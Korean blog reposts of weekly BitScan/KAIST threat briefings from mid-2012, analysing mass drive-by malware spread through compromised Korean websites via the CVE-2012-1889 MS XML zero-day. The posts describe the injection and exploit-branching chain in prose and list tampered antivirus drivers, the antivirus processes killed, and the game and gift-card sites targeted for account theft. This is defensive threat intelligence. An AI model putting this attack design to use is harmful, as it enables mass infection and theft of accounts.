태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.


본 문서들은 카이스트 사이버 보안연구센터 게시물에서 다운로드 받으 실 수 있습니다.

국문과 영문 버전 모두 올려져 있습니다.


http://csrc.kaist.ac.kr/2011/sub04/sub04_02.php



패치는 지난 7월 2주차 수요일에 발표 되었습니다. 악성링크의 활용도를 보면 공격자들이 얼마나 효율적으로 공격에 이용하는 지를 볼 수 있습니다. 더불어 Metasploit에 나온 사용 법들은 개별 PC나 서비스를 대상으로 공격하는 모델입니다만.. 본 전문분석에 분석된 내용들은 웹소스에 추가되어 전문적으로 모든 웹 방문자를 대상으로 하여 공격이 일어난 공격 모델입니다.


단언하건데 개별 공격기법에 대한 분석들은 여기저기에 있습니다만 , 대량 감염을 위해 이용된 모델에 대한 분석은 최초의 자료라고 말씀 드릴 수 있습니다.


7월 1주차 까지는 다양한 1889 취약성에 대한 공격 비율은 거의 100%에 가깝게 활용 되었으며 패치 발표 이후 공격 비율은 급속도로 떨어지는 것을 볼 수 있습니다. 이미 공격을 위해 설계해둔 코드들을 활용 하지 않는다는 것을 의미하죠.



공격기법상으로 보면 일단 정상적인 웹서비스(?) 침입을 합니다. 모 신문사처럼 대문 페이지도 바꿀 수 있지만 공격자들은 그렇게 하지 않습니다. 정보는 이미 다 가져갔고 이제는 악성코드를 감염시키는 숙주로 활용을 할 뿐입니다.


웹서비스에 침입을 하고 내부의 웹소스코드를 변경 합니다. 여기에 악성링크들의 주소를 넣도록 하죠. 그렇게 되면 이런 형태가 됩니다.


위의 코드에는 악성링크의 주소가 들어 있으며 모든 방문자들이 방문 할때 마다 실행 되는 공용 함수 기능 (js file) 에 추가 하여 전체 방문자가 영향을 받도록 해 두었습니다.


단지 소스코드에 암호같은 코드를 한줄 추가 함으로써 홈페이지 방문자들은 악성코드의 직접적인 공격을 모두 받게 됩니다. 그 대상은 예외가 없습니다. Flash 사용자 , Java 설치, IE 취약성등등.. 거기에 이제 패치가 없었던 MS XML 서비스에 대한 공격도 직접 발생된 것이죠. 이전까지는 10명중 6명이 위험했다면 이젠 9명 가량이 위험한 상태로 방치된 상황이 패치 발표 이전까지 계속된 것입니다.



< 전자신문에 기고 되었던 연예기획사 페이지에서의 제로데이 공격 코드 유포 화면>

ref: http://www.etnews.com/news/computing/security/2607571_1477.html


단지 홈페이지에 접속만 했을 뿐인데도 악성링크들은 클릭 이나 다른 어떤 사용자의 행동 없이 실행이 되게 되고 사용자 PC를 좀비 PC로 만듭니다. 기존에는 Java , Flash 취약성들이 제대로 패치가 안된 PC들이 많았으므로 해당 취약성을 이용하는 공격코드가 많았습니다.


그러나 패치 없는 공격코드가 출현 하는 즉시 제로데이 공격코드를 이용해 사용자 PC를 공격 하였고 아마 국내 IE 사용자 비율로 보았을때 감염 비율은 90% 가량이 될 것으로 예상이 됩니다. 즉 단지 홈페이지를 방문만 하였을 뿐임에도 불구하고  10명중 9명은 좀비 PC가 되었다는 것을 의미합니다.


이렇게 확보된 수많은 좀비 PC들의 수치는 규모상으로도 엄청난 수치일 것임은 분명합니다. 대부분은 게임계정 탈취를 목적으로 하였지만 백도어와 루트킷 들도 있었고 외부로 부터 공격 명령을 기다리는 내용들도 있었으니 이 악성코드들이 이후에 어떤 일들을 했는지는 알려진 바가 없습니다.


공격자의 의도에 의해 조정이 될 수 밖에 없으니 말입니다.


왜 이런 전문분석을 공개하고 위험성에 대해서 공개적으로 알리느냐 하는 점은 현재의 위험을 직접적으로 알리고 얼마나 위험한 상황에 우리가 처해 있는지를 알리기 위해 하는 것 뿐입니다.


향후에도 패치가 없는 공격은 계속 됩니다. 또한 이젠 개별 PC나 소수의 서비스를 대상으로 한 공격보다 더 큰 규모의 모든 인터넷 사용자를 대상으로한 전방위적인 공격 방식까지도 활용이 되고 있습니다.


다음에도 패치가 없는 제로데이 공격이 웹서비스를 통해서 유포 된다면 더 심각한 상황에 수시로 돌입 할 수 있음을 알리고자 .. 조금 더 상세한 설명과 보안정보제공 서비스 구독 고객에게만 제공되는 전문분석을 공개하기로 한 것이므로 잘 살펴 보시고 대응 하시기 바랍니다.


언제나 그랬듯이 일정규모 이상의 위험성이 감지되면 공개적으로 알리고 저희가 할 수 있는 대응은 할 수 있도록 하겠습니다.  빛스캔의 플랜은 " 세상을 바꾸는 플랜" 이며 "널리 사람과 세상을 이롭게 만드는 것" 입니다.


구독서비스의 신청에 대해서는 한국인터넷 동향 브리핑을 참고 하십시요.


-바다란




Posted by 바다란

빛스캔과 KAIST 사이버보안연구센터에서 공동 운영하는 보안정보 제공 서비스 7월 1주차 국내 인터넷 환경의 위협 분석 내용이며 본 보고서는 빛스캔의 PCDS ( Pre Crime Detect System)의 탐지역량과 KAIST 정보보호대학원. 사이버보안센터의 분석 역량이 결집된 분석 보고서 입니다. 매주 수요일 한 주간의 국내 인터넷의 실질적인 위협 동향을 분석하고 대응을 하도록 방향 제시를 하고 있습니다.


본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며, 공격 형태의 변화에 따라, 대규모로 확장 및 개선된 상황을 유지하며 운영 되고 있습니다.


본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.

1. 악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지

2. 악성링크가 공격에 활용하는 주된 취약성에 대한 내부 보안 강화 정책 - 패치

3. 내부 감염된 APT 공격의 확인 및 제거에 활용 ( 기술 분석 문서 참고)


* 보고서 내용 중에 기술분석 보고서에는 악성링크의 유형과 실제 감염을 시키는 악성코드의 타입에 따라 보고서가 기술 되어 있습니다. 각각은 별개 이므로 악성링크 ( 사용자 PC에 악성코드를 내리기 위한 공격코드 )에 대한 분석과 실제 악성코드의 행위와 기능에 대한 분석 시에 참고 하세요. 각각의 악성링크의 분석에는 최종 다운로드 되는 악성코드까지 기술이 되어 있습니다. 금주 차에는 CVE 2012-1889 ( MS XML Core Zeroday)에 대한 전문분석이 포함 되어 있습니다. 전문분석은 Professional Service를 받는 고객사가 생기는 즉시 해당 고객사에만 전달이 됩니다. 참고 하세요.

 


금주 차의 특징은 패치가 없는 제로데이 (CVE 2012-1889 MS XML Core Service)의 적극적 활용으로 정의가 됩니다. 본 브리핑 작성 시점에 MS의 정규 업데이트 패치에 MS XML Core Service의 패치가 배포 되었으니 즉시 반영이 필요합니다. ( http://technet.microsoft.com/ko-kr/security/bulletin/MS12-043 –자동 업데이트 서비스 활성화를 해두시면 적용이 됩니다. )

 

전주 대비 악성링크가 감소된 비율을 보이고 있으며 MS XML 취약성에 대한 공격이 매우 적극적으로 이용 되었으며 상당한 피해가 발생 되었을 것으로 예측이 되고 있습니다. 대규모 유포 시도가 탐지된 6월 3주차 이후 Malware-net의 활동은 대규모로 감소된 형태를 여전히 보이고 있으며, 신규로 1~20개 이내의 Malware net의 운영은 계속 되고 있습니다. 언제든 규모 확대가 적극적으로 가능한 만큼 계속해서 관찰하고 추적을 하고 있으며 특이 사항 발견 시에는 즉시 반영 되어 전달이 될 것입니다.


공격자들에 대해서 언급 할 때 항상 언급 하는 것이 “비용 대비 효과” 입니다. 이전까지는 최대 6가지 이상의 취약성을 공격하는 형태였으며 이 공격의 성공률은 60% 가량이라고 빛스캔에서 공격로그를 통해 입증한 바가 있습니다. 6월 3주차에 새로운 공격기법으로 장착된 제로데이 ( 2012-1889) 공격으로 인해 공격 성공률은 대폭 높아졌을 것으로 예상된다 말씀 드렸는데 그 효과를 반증하는 데이터가 동향 보고서에 언급 되어 있습니다. 또한 금주 차의 악성링크들은 방문자가 많은 상위 웹서비스들에 집중된 형태로서 제로데이 공격을 적극적으로 활용한 상황입니다. 범위의 축소가 영향력 감소를 의미하지는 않습니다. 항상 일정 수준의 효과, 최상의 효과를 거둘 수 있는 방식에 대해 공격자들은 너무나도 잘 알고 활용 하는 상태입니다.

 

공격자들은 6월 3주차부터 검증 이후 대거 MS XML 공격 코드를 적용 하였고 금주 차에는 거의 모든 공격 세트에 적용을 시킨 상태로 활용이 되었습니다. 전체적으로 악성링크의 수치는 감소 하였고 발견된 악성링크들 대부분이 XML 취약성을 공격하여 이전의 규모와 범위 확대로 거둔 효과와 동일한 결과를 얻은 것으로 판단이 됩니다.

 

EMB00000edc0d6b


<공격에 사용된 악성링크중 XML 취약성 공격 포함 비율>


 

EMB00000edc0d69


< 전체 악성링크의 감소와 XML 취약성 공격 포함 비율 챠트>


악성링크를 줄인 이후에도 공격성공률이 일정 수준 이상을 유지하고 있어서 범위를 확대 시키지 않는 것으로 보이며, 각 주요 인터넷 서비스별 방문자가 상위인 웹서비스를 타켓화 하여 소스를 변조하고 악성코드를 유포함으로써 공격성공률을 늘리는 방식을 적극 활용 한 한 주입니다.

 

모든 악성링크들은 초기에 사용자 브라우저 종류 및 버전을 체크하고 그에 맞는 공격 부분으로 분기를 합니다.공격성공률을 확인하기 위한 통계 정보 수집은 항상 존재하며, 각 IE, Java, Flash 부분에 대한 권한 획득 부분으로 분기하여 그에 맞는 공격코드들을 실행합니다. 그 이후 PC의 권한을 획득하고 최종 악성코드들을 다운로드 하여 PC에 설치하게 됩니다. 이 성공률이 제로데이 출현 이전에는 60%( 10명중 6명 감염) , 현재 적극적 활용 단계에서는 최소 90% 수준으로 예상이 되고 있습니다. 제로데이 출현 이전에는 공격 성공률과 범위 확대를 위해 대규모 Malware-net을 운영하고 적극적으로 활용 하였으나, 지금 상황에는 Malware-net을 운영하지 않아도 충분한 공격효과를 거둘 수 있으므로 적극적인 범위의 확대를 하지 않는 것으로 보입니다. 또한 7.11일 금일 현재 MS의 패치가 배포 되었으므로 향후 Malware net의 확장 및 범위는 적극적으로 늘어날 것으로 예측이 되고 있어 향후 추적에 주의를 기울일 예정입니다.

 

 

금주 공격의 특징은 다음과 같습니다.

  • Malware-Net 활동의 축소 (소규모 Malware net은 계속 활동) 및 제로데이 취약성 공격 활용 대부분 악성링크 이용 

  • 파일공유, 언론사, 커뮤니티, 연예기획사, 소셜쇼핑, K-pop , 부동산 서비스, 포털, 종교 등을 총망라한 상위 사이트에 대한 악성코드 유포 
    • 본 공격들은 대부분 MS 제로데이 공격코드도 동시에 영향을 미치도록 되어 있습니다.
      금주 파악된 MS 제로데이 유포와 연관된 내용은 18종, 59개 정도의 웹서비스에서 활동 하였으며 대형 사이트들이 해당 되었습니다.  그 동안 활동이 미미했던 파일 공유 사이트들도 상위 5개의 웹서비스에서 중계 되어 영향력은 이전과 비교하기 어렵습니다
    • 파일 공유 사이트 및 소셜쇼핑의 경우 3개월 이상 소규모적인 유포 시도들만 있었는데 금주 차에는 적극 활용 되었으며 그 의미는 근본 취약성은 그대로 공격자들이 보유하고 있고 언제든 이용 할 수 있는 상태라는 것을 의미합니다.
  • 최초 악성링크 내에 추가적인 연결 링크들을 갖추고 있는 형태 및 다양한 취약성을 공격하는 하이브리드 형태의 악성링크 공격 계속

  • 국내 주요 백신들에 대한 시스템 파일 직접 변조 발견 ( V3 , 알약 대상) 및 백신 서비스(맥아피 보안 서비스 업데이트)로 위장한 서비스 등록 발견
   
  • 게임 계정 이외에 문화상품권 및 게임머니 거래 사이트에 대한 계정 탈취 시도가 최초 발견 되었습니다.
  • 대부분의 게임 계정 탈취 및 백신 서비스 Killing은 계속 되었으며, 계정 탈취는 BHO 를 이용한 유형이 가장 많이 발견 되고 있어 해당 부분에 대한 전문분석 제공 예정입니다. 지난주 차에 전달 드린 전문분석의 연결 편으로 제공 될 예정입니다.

* 유포지와 중계지의 의미는 사용자 관점 이나 악성링크의 관점에서 다를 수 있습니다. 저희는 사용자 관점에서 웹 서핑시 방문한 웹서비스가 문제가 있어서 감염이 된다면 직접 방문한 사이트는 ‘ 악성코드 유포지’ , 악성코드를 받아 오게 하는 임의의 주소를 ‘ 악성링크’ , 최종 사용자에게 감염을 일으키는 파일 자체를 ‘악성코드’라고 정의 하고 있습니다.


 

 

사용자 PC에 대한 직접적인 공격을 일으키는 취약성은 복합적으로 사용 되고 있으며, 지금까지 많은 비중을 차지 하였던 Java 취약성 및 Flash 취약성 공격은 소폭 감소한 반면, MS의 XML 취약성 공격코드는 대거 채용되어 활용이 되었습니다.  대부분의 APT 및 백도어 유형들이 java 취약성을 이용하였으나 금주에는 MS XML 취약성을 이용한 APT 유형들이 발견 되었습니다.

 

사용자 PC에 설치 되는 악성코드들은 항상 백신을 우회해서 설치가 되고 또 계속해서 변형들이 출현 하고 있는 현 상황에서 웹 서핑만 해도, 웹 서비스에 방문만 해도 감염이 되는 공격코드들은 창궐 하고 있습니다. 항상 말씀 드렸듯이 지금과 같은 상황을 가장 염려하고 있으며 사후 대응이 아닌 사전 대응에 중점을 두어야 된다고 주장한 강력한 원인이기도 합니다.

 

현재 모든 솔루션들은 사후 대응에 중점을 두고 있는데, 가장 중요한 것은 사전에 대응이 되는 것이냐가 핵심입니다. 또한 발생 가능한 위험을 얼마나 컨트롤 할 수 있는지가 핵심이라 할 수 있으며, 문제 해결책을 찾을 수 있을 것입니다. 이번 XML 사안에서 보듯이 3주 가량 무방비 상태에서 노출이 되었으며 단 3주 만에 공격자들은 대거 해당 취약성을 대거 이용하는 형태를 보일 정도로 빠른 적응력을 보이고 있습니다. 향후에도 패치가 없는 제로데이 출현 시 빠르게 이용 할 것으로 보이므로 사후 대응 측면 보다는 사전에 위험을 제거 할 수 있는 선제적인 대응력이 핵심이 되어야 할 것입니다.


  • Oracle Java 취약성, Adobe Flash 취약성 , MS의 XML , Midi 및 IE 취약성이 같이 사용 되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다. 특히 금일자로 패치가 발표된 MS XML (CVE 2012-1889) 취약성의 경우 반드시 업데이트를 적용 하시기 바랍니다.
  • 기술분석 보고서에 기술된 루트킷 및 키로거, 백도어 기능을 가진 악성코드들은, 사용자 PC의 드라이버 및 시스템 파일 교체, 윈도즈 서비스 등록등을 실행하고, 내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰 되고 있어서 위험성이 높습니다. 또한 백도어 기능의 설치 시에는 시스템상의 백신 프로세스 Kill 이후에 루트킷 형태를 설치하고 이후 다운로드 받은 모든 악성코드와 실행 주체를 삭제하여 정체를 은폐하고 있으므로 사전 대응에 만전을 기하세요.

     
  • 기술분석보고서에 언급된 게임계정 유출 악성코드들은 전체 악성코드의 80% 이상이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다. 모두 시스템에서의 백신 프로세스를 중지 시키고 국내.외 거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있으며 현재 목적은 게임계정 탈취로 보여지고 있으나 언제든 외부 도메인 연결과 업데이트를 통해 다른 형태로 전환이 될 수 있습니다. 

 

  • 백신에 대한 시스템 파일 변조 내용

 

* 정상적인 백신 운영이 될 수 없으므로 각 백신 개발사들의 주요 파일에 대해 변조 여부 강력한 체크가 필요해 보입니다.

백신명

변조된 파일

V3

C:\WINDOWS\system32\Drivers\v3engine.sys

C:\WINDOWS\system32\Drivers\v3core.sys

C:\WINDOWS\system32\Drivers\ahnsze.sys

C:\WINDOWS\system32\Drivers\AhnRghNt.sys

C:\WINDOWS\system32\Drivers\AhnRecNt.sys

C:\WINDOWS\system32\Drivers\AhnRec2k.sys

C:\WINDOWS\system32\Drivers\AhnFltNt.sys

C:\WINDOWS\system32\Drivers\AhnFlt2k.sys

Alyac

C:\WINDOWS\system32\Drivers\EstRtw.sys


 


  • Diablo III에 대한 공격이 추가된 게임 계정 모니터링 및 백신 Kill 항목, 게임 머니 및 문화상품권 탈취 목록 추가


* 본 내용은 최근의 악성코드들이 기본적으로 탑재하고 있는 기능이며 6월 4주차 까지 발견 되었던 백신과 게임 계정 탈취 이외에도 문화상품권과 게임 머니 사이트에 대한 계정 탈취 기능이 추가 되었습니다.

 

프로세스명

프로그램명

백 신

sgbider.exe, vcsvc.exe

vcsvcc.exe

바이러스체이서

NVCAgent.npc, nsvmon.npc

Nsavsvc.npc, NaverAgent.exe

네이버백신

V3LRun.exe, MUpdate2.exe

SgSvc.exe

V3Light.exe, V3LTray.exe

V3LSvc.exe

V3

AYUpdSrv.aye,

AYRTSrv.aye, SkyMon.exe

AYServiceNT.aye

AYupdate.aye, AyAgent.aye

알약

PCOTP.exe

 

넥슨 OTP

게 임

gamehi.co.kr

게임하이

hangame.com

한게임

netmarble.net

넷마블

Raycity.exe

레이시티

ff2client.exe

피파 온라인2

pmang.com

피망

df.nexon.com, dnf.exe

던전 앤 파이터

DragonNest.exe, dragonnest.nexon.com

드래곤 네스트

WinBaram.exe, baram.nexon.com

바람의 나라

heroes.exe

마비노기 영웅전

wow.exe

월드 오브 워크래프트

lin.bin

리니지

MapleStory.exe

메이플 스토리

clubaudition.ndolfin.com

클럽 오디션

www.capogames.netsamwinfo.capogames.net

삼국지w

Diablo III.exe

디아블로III

게임머니&문화상품권

www.booknlife.com

북앤라이프

www.cultureland.co.kr

컬쳐랜드

www.happymoney.co.kr

해피머니

www.teencach.co.kr

틴캐시

 
 

본 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 및 감염입니다.

금일 이전까지 패치가 없는 상태에서 피해는 매우 심각한 상황 이였을 것으로 예상 되고 있습니다.




금주 공격에 사용된 취약성 비율


상세 분석 진행에 따라 취약성 판정 비율이 일정 부분 달라지고 있습니다만 큰 흐름은 차이가 없습니다.. 공격이 많이 복잡한 형태를 띄고 있어서 정확한 CVE 판정이 어려운 상황도 발생 되고 있는 상황입니다.

 

- CVE 2011-3544 ( 24.4%) Java Applet 취약성

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

- CVE 2012-0507 ( 24.4%) Java Applet 취약성 - Java Web start 취약성

  http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html

- CVE 2012-1889( 23.4%) MS XML Core Service 취약성

  http://technet.microsoft.com/ko-kr/security/advisory/2719615

- CVE 2012-0003 (13.2%) Windows Midi 취약성 –

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003

- CVE 2012-0754 (12.2%) Flash 취약성 –

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

- CVE 2010-0806 (1%) IE 취약성 ( IE 6,7 대상)

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806

- CVE 2010-0249 (0%) IE 취약성 –

  http://www.microsoft.com/technet/security/Bulletin/MS10-002.mspx

- CVE 2011-2140 (0%) Adobe Flash 취약성

http://www.adobe.com/support/security/bulletins/apsb11-21.html


취약성 비율을 살펴 보시면 아시겠지만 MS 제로데이 취약성에 대한 공격은 전주 대비 활용도에 있어서 증가 하였습니다.

전주의 공격 시에 효과가 좋았던 것으로 판단되어 적극적으로 활용 하였으며 향후 패치 적용 범위에 따라 다른 공격들도 계속 출현 할 것으로 예상됩니다.


금주의 차단 추가 영역은 다음과 같습니다. 아래 영역은 이미 공격자가 권한을 통제하고 있는 IP대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다. 기업 및 기관에서는 해당 IP 대역 차단 이후 ( 업무 관련성 여부에 대해서는 각 기관 및 기업별 검토 필요) 차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다.



악성링크에 이용 되는 미국의 EGI Hosting 사의 IP 대역 상당수를 직접 악성링크로 활용한 사례가 발견 되어 해당 IP 대역에 대해 강력한 차단을 유지하실 것을 권고 합니다.


차단 권고 대역


* 기술 분석 보고서에는 별도의 차단 대역들이 존재하니 참고 하시고 사안별로 모니터링 및 차단에 적극 활용 바랍니다.



-공개용은 제외


 

현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다. 또한 어떤 방식으로든 빛스캔의 악성링크 탐지와 분석 내용에 대해서 인지를 일부 하고 있는 것으로 판단 됩니다. 또한 금주의 총평으로는 제로데이의 적극적인 활용입니다. 방문자가 상위인 서비스들을 적극 공략 하였으며 범위의 확대 보다는 효율을 높이는 것에 집중을 하였습니다.  제로데이 공격이 증가한 가장 큰 이유는 공격에 대한 효과가 충분히 검증 되었다는 반증이라 할 수 있으며, 향후에도 유사 사례는 계속 발생 할 것으로 예상 되고 있습니다. 대규모 유포 시도에 대해서 활용 된다면 언제나 가장 먼저 정보 제공이 가능함을 약속 드립니다.


본 정보제공 서비스는 공개, 배포 금지( 내부에서만 활용), 비영리 목적으로만 활용 가능합니다.


공익적인 목적으로 기관에 제공 되는 서비스들은 내부 사정에 의해 언제든 종료 될 수 있습니다.


감사합니다.


*시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다. KAIST CSRC 주간보안동향 보고서는 1p 짜리의 요약형태로 작성이 되며 무료 배포가 가능합니다. 해당 서비스의 신청은csyong95@kaist.ac.kr 로 신청 하시면 됩니다.


* 정식 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/ 담당자/ 연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다. 본 서비스의 권리는 빛스캔에 있으므로 공개적 활용 및 영리적 목적으로 활용 하실 수 없습니다.


* 본 분석은 악성링크 자체의 수집은 빛스캔의 PCDS (Pre crime detect system)를 통해 수집하며, 악성링크 및 악성코드 분석은 KAIST 사이버보안연구센터, 정보보호대학원과 공동으로 진행합니다.

Posted by 바다란


지금의 상황은 폭풍우가 내리치는 벌판에서 홀로 서 있는 사람이 있고 비를 막을 수 있는 것은 우산 ( 보안제품)과 우의 ( 보안패치) 밖에 없는 상황입니다.

그러나 내리는 비는 우산을 피해서 ( 보안제품을 우회) 안으로 들어오고 우의를 쓰지 않은 얼굴에만 집중적으로 ( 패치가 없는 제로데이) 비바람이 몰아치고 있습니다.

이 비바람은 멈추지 않습니다. 더 큰 우산을 쓰거나, 아킬레스건과도 같은 취약한 부분이 보강 되지 않는다면 앞으로는 더 심각한 상황을 마주하게 될 것입니다.


지금도 충분히 심각하지만 주도권 자체가 넘어 갈 수 있는 상황임을 반드시 인식 하여야 할 부분이라 생각 됩니다. 


심각성이 어느 정도인지 6월 4주차 브리핑 살펴 보겠습니다.



--------------------------------------------------------------



빛스캔과 KAIST 사이버보안연구센터에서 공동 운영하는 보안정보 제공 서비스 6월 4주차 국내 인터넷 환경의 위협 분석 내용이며 본 보고서는 빛스캔의 PCDS ( Pre Crime Detect System)의 탐지역량과 KAIST 정보보호대학원. 사이버보안센터의 분석 역량이 결집된 분석 보고서 입니다. 매주 수요일 한 주간의 국내 인터넷의 실질적인 위협 동향을 분석하고 대응을 하도록 방향 제시를 하고 있습니다.


본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며, 공격 형태의 변화에 따라, 대규모로 확장 및 개선된 상황을 유지하며 운영 되고 있습니다.


본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.


1. 악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지

2. 악성링크가 공격에 활용하는 주된 취약성에 대한 내부 보안 강화 정책 - 패치

3. 내부 감염된 APT 공격의 확인 및 제거에 활용 ( 기술 분석 문서 참고)


* 보고서 내용 중에 기술분석 보고서에는 악성링크의 유형과 실제 감염을 시키는 악성코드의 타입에 따라 보고서가 기술 되어 있습니다. 각각은 별개 이므로 악성링크 ( 사용자 PC에 악성코드를 내리기 위한 공격코드 )에 대한 분석과 실제 악성코드의 행위와 기능에 대한 분석은 별개 이므로 보고서 구독 시에 참고 하세요. 각각의 악성링크의 분석에는 최종 다운로드 되는 악성코드까지 기술이 되어 있습니다. 금주 차에는 악성코드가 시스템에 설치되고 난 이후의 악의적인 행동들에 대한 전문 분석도 포함 되어 있습니다. 전문분석은 Professional Service를 받는 고객사가 생기는 즉시 해당 고객사에만 전달이 됩니다. 참고 하세요.



금주 차의 특징은 제목에 기술되었듯이 패치가 없는 제로데이 (CVE 2012-1889 MS XML Core Service)의 대공습으로 정의가 됩니다.

전주 대비 제로데이 관련된 악성링크가 대폭 증가된 비율을 보이고 있으며 활발하게 활동을 하고 있습니다. 6월 3주차 최초로 대규모 유포 시도가 탐지된 이후 Malware-net의 활동은 대규모로 감소된 형태를 보이고 있으며 여전히 관찰은 계속 진행 하고 있습니다. Malware-net에 대한 상위 3개의 정보를 이미 제공 드렸고, 현재는 해당 Malware-net들은 활동이 중지된 상태로 판단됩니다. 그러나 단 1일만에 200여개 이상의 웹 서비스들에 순식간에 추가된 형태로 볼 때 향후 언제든 재발 할 수 있다고 판단 하고 있습니다.


공격자들에 대해서 언급 할 때 항상 언급 하는 것이 “비용 대비 효과” 입니다. 이전까지는 최대 6가지 이상의 취약성을 공격하는 형태였으며 이 공격의 성공률은 60% 가량이라고 빛스캔에서 공격로그를 통해 입증한 바가 있습니다. 지난 주에 새로운 공격기법으로 장착된 제로데이 ( 2012-1889) 공격으로 인해 공격 성공률은 대폭 높아졌을 것으로 예상되며, 국내 IE 사용자 비율로 보았을 때 상당한 규모의 감염이 예상 됩니다. 금주에 대량으로 발견된 악성링크의 구조는 6월 3주차 발송 메일에 포함된 이미지가 잘 표현을 하고 있습니다.





< 공격링크의 구조>


모든 악성링크들은 초기에 사용자 브라우저 종류 및 버전을 체크하고 그에 맞는 공격 부분으로 분기를 합니다. 공격성공률을 확인하기 위한 통계 정보 수집은 항상 존재하며, 각 IE, Java, Flash 부분에 대한 권한 획득 부분으로 분기하여 그에 맞는 공격코드들을 실행합니다. 그 이후 PC의 권한을 획득하고 최종 악성코드들을 다운로드 하여 PC에 설치하게 됩니다. 이 성공률이 제로데이 출현 이전에는 60%( 10명중 6명 감염) , 현재 적극적 활용 단계에서는 최소 90% 수준으로 예상이 되고 있습니다. 제로데이 출현 이전에는 공격 성공률과 범위 확대를 위해 대규모 Malware-net을 운영하고 적극적으로 활용 하였으나, 지금 상황에는 Malware-net을 운영하지 않아도 충분한 공격효과를 거둘 수 있으므로 적극적인 범위의 확대를 하지 않는 것으로 보입니다.

금주 공격의 특징은 다음과 같습니다.

  • Malware-Net 활동의 축소 ( 공개에 따른 대응도 영향을 미쳤을 것으로 판단 됩니다. ) 및 제로데이 취약성 공격 활용 급증
  • 파일공유, 언론사, 커뮤니티, 연예기획사, 호스팅업체, K-pop 웹서비스, 부동산 서비스, 포털 등을 통한 적극적인 악성코드 유포
    • 본 공격들은 대부분 MS 제로데이 공격코드가 사용자에게 유포 되었으며, 본 건과 관련된 기사 예정 되어 있습니다.
    • 금주 파악된 MS 제로데이 유포와 연관된 내용은 29종의 악성링크가 총 90여개 이상의 웹 서비스들에서 중계 되었습니다.
  • 최초 악성링크 내에 추가적인 연결 링크들을 갖추고 있는 형태 및 다양한 취약성을 공격하는 하이브리드 형태의 악성링크 구조 확대
  • 자유자재로 웹서비스 소스코드에 악성링크의 추가 및 삭제, 악성 코드 분석 방해를 위한 기법 강화

  • * 유포지와 중계지의 의미는 사용자 관점 이나 악성링크의 관점에서 다를 수 있습니다. 저희는 사용자 관점에서 웹 서핑시 방문한 웹서비스가 문제가 있어서 감염이 된다면 직접 방문한 사이트는 ‘ 악성코드 유포지’ , 악성코드를 받아 오게 하는 임의의 주소를 ‘ 악성링크’ , 최종 사용자에게 감염을 일으키는 파일 자체를 ‘악성코드’라고 정의 하고 있습니다.



    사용자 PC에 대한 직접적인 공격을 일으키는 취약성은 복합적으로 사용 되고 있으며, 지금까지 많은 비중을 차지 하였던 Java 취약성 및 Flash 취약성 공격은 소폭 감소한 반면, MS의 XML 취약성 공격코드는 대폭 증가된 형태를 보이고 있습니다. 지금 까지는 패치가 있는 부분이라 패치를 권고 드렸으나 현재 2012-1889 취약성에 대해서는 패치가 없는 상태이며 임시 대응책만 존재하는 형태라 심각성이 매우 높습니다. 사용자 PC에 설치 되는 악성코드들은 항상 백신을 우회해서 설치가 되고 또 계속해서 변형들이 출현 하고 있는 현 상황에서 웹 서핑만 해도, 웹 서비스에 방문만 해도 감염이 되는 공격코드들은 창궐 하고 있습니다. 항상 말씀 드렸듯이 지금과 같은 상황을 가장 염려하고 있으며 사후 대응이 아닌 사전 대응에 중점을 두어야 된다고 주장한 강력한 원인이기도 합니다.



    현재 모든 솔루션들은 사후 대응에 중점을 두고 있는데, 가장 중요한 것은 사전에 대응이 되는 것이냐가 핵심입니다. 또한 발생 가능한 위험을 얼마나 컨트롤 할 수 있는지가 핵심이라 할 수 있으며, 문제 해결책을 찾을 수 있을 것입니다. 패치가 없는 상태에서 대량 공격 방안을 가지고 있는 공격자들에게 대항 할 수 있는 대책은 그리 많지 않아 보입니다. 향후에도 대책 없는 공격의 확산은 계속 될 것이고 이제 시작된 것입니다. “이제 가장 우려 했던 위협들이 시작 되었습니다.”



    • Oracle Java 취약성, Adobe Flash 취약성 , MS의 XML , Midi 및 IE 취약성이 같이 사용 되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다. 특히 패치가 없는 상태의 MS XML (CVE 2012-1889) 취약성의 경우 반드시 임시 예방책이라도 적용 하실 것을 권고 드립니다.
